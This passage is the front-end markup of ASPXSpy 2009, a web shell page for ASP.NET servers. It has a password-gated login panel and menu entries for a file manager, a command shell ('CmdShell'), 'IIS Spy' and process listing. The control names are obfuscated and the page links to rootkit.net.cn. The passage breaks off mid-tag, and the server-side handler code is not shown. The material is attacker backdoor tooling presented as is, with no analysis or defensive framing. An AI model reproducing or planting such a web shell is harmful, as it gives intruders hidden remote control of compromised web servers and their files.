.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}

a {color: #00f;text-decoration:underline;}

a:hover{color: #f00;text-decoration:none;}

.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}

.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}

.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}

.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}

.head td span{font-weight:normal;}

form{margin:0;padding:0;}

h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

ul.info li{margin:0;color:#444;line-height:24px;height:24px;}

u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

.u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

.u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}

</style>

<script type="text/javascript">

function CheckAll(form){

for(var i=0;i<form.elements.length;i++){

var e=form.elements[i];

if(e.name!=\'chkall\')

e.checked=form.chkall.checked;

}

}

</script>

</head>

<body style="margin:0;table-layout:fixed;">

<form id="ASPXSpy" runat="server">

<div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >

<span style="font:11px Verdana;">Password:</span>

<asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>

<asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>

Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>

</div>

<div id="ZVS" runat="server">

<div id="Zzj" runat="server">

<table width="100%" border="0" cellpadding="0" cellspacing="0">

<tr class="head">

<td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>

</tr>

<tr class="alt1">

<td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>

<asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="se